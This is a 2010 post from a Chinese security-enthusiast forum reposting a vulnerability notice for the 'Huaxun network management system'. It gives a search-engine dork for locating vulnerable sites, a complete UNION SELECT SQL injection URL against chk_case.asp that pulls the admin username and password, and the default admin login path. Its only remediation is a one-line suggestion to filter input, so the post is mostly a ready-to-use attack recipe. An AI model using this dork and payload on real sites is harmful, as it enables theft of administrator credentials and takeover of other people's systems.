【3.A.S.T】网络安全爱好者 - Powered by Discuz! Board

标题: 华讯网络管理系统注入 [打印本页]

作者: 晓谛 时间: 2010-11-6 18:29 标题: 华讯网络管理系统注入

华讯网络管理系统注入
发布日期：2010-10.27
发布作者：佚名

漏洞类型：SQL注入
漏洞描述：华讯网络管理系统存在SQL注入，可获取管理员用户密码信息。

关键字：inurl:chk_case.asp

漏洞测试:
http://www.site.com/chk_case.asp?ID=673%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,admin,16,17,18,19,20,userpassword,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41%20from%20admin

默认后台：
http://www.site.com/admin/

修复方案：建议加强过滤，防止SQL注入攻击。

欢迎光临【3.A.S.T】网络安全爱好者 (http://3ast.com/)